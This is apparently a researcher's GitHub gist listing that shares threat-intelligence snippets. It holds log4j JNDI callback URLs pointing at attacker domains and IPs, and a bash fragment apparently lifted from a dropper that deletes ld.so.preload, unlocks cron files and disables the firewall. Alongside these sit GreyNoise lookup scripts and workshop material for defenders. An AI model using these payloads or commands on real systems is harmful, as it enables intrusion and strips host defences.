
Nick Roy superducktoes


Keybase proof

I hereby claim:

  • I am superducktoes on github.
  • I am superducktoes (https://keybase.io/superducktoes) on keybase.
  • I have a public key whose fingerprint is B2C5 91D5 AF7C C0B6 F068 7567 0517 E3C4 ED54 7340

To claim this, I am signing this object:

@superducktoes
superducktoes / Callback Domains log4j
Last active April 4, 2022 15:33
Callback Domains log4j
ldap://e2216d7a9a31.bingsearchlib.com:39356/a
ldap://612877d3a59b.bingsearchlib.com:39356/a
ldap://205.185.115.217:47324/a
ldap://ab3419ba1f45.bingsearchlib.com:39356/a
ldap://193.3.19.159:53/c
ldap://ea62856c5fc3.bingsearchlib.com:39356/a
ldap://43065f484327.bingsearchlib.com:39356/a
ldap://5486b6edd688.bingsearchlib.com:39356/a
ldap://92d27039ede4.bingsearchlib.com:39356/a
ldap://45cecd2f38ca.bingsearchlib.com:39356/a
#!/bin/bash
ulimit -n 65535
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F
from greynoise import GreyNoise
import json
import csv
import argparse
import os
from stix2 import MemoryStore, Indicator
api_client = GreyNoise(api_key="")
parser = argparse.ArgumentParser()
{
"type": "bundle",
"id": "bundle--156aade4-a0b9-4931-aef7-f400b2ffd1d7",
"objects": [
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7f7cfee6-7cb4-4d8f-8012-bc5959a53564",
"created": "2022-05-19T20:10:17.632149Z",
"modified": "2022-05-19T20:10:17.632149Z",
import fileinput
import re
from greynoise import GreyNoise
# command usage: cat <file_ips>.txt | python3 file_ips_lookup.py
api_client = GreyNoise(api_key="")
ip_list = []
# parse file for ips
@superducktoes
superducktoes / GreyNoise Firewall Dashboard
Last active May 1, 2023 17:15
Firewall dashboard for Splunk enriching with GreyNoise data
<form theme="dark">
<label>GreyNoise Firewall Data</label>
<fieldset submitButton="false">
<input type="time" token="field1">
<label></label>
<default>
<earliest>-24h@h</earliest>
<latest>now</latest>
</default>
</input>
@superducktoes
superducktoes / workshop.txt
Last active November 8, 2022 22:15 — forked from Supriya-Maz/workshop.txt
GN Road Show Workshop
Stop Chasing Ghosts: California Roadshow
Cheat Sheet
You’re working at a sticker company called “Milk Co.” One of your developers leaves a vulnerable dev environment exposed to the internet. Users at the workshop will play the role of the Security Analyst at “Milk Co.” and have to investigate the alert to understand what happened, decide how they can stop additional attacks quickly, and then do additional investigation into indicators that can be used for hunting.
Question Answer Form
https://stopchasingghosts.typeform.com/to/JWKos6K2
[Optional] Slack Channel: Join GreyNoise Community Slack and find channel #roadshow-dc
@superducktoes
superducktoes / GreyNoise GNQL Query Results
Created November 1, 2022 22:23
Query GreyNoise without the GN SDK
import requests
import json
GN_API_KEY = ""
GN_QUERY = "last_seen:1d classification:malicious"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"
HEADERS = {
"accept": "application/json",
@superducktoes
superducktoes / gn_query_write_to_file.py
Last active May 22, 2023 19:22
GreyNoise Write IPs To File
import requests
import json
GN_API_KEY = ""
GN_QUERY = 'tags:"SSH Bruteforcer" last_seen:1d spoofable:false'
file_name = "./greynoise_ips.txt"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"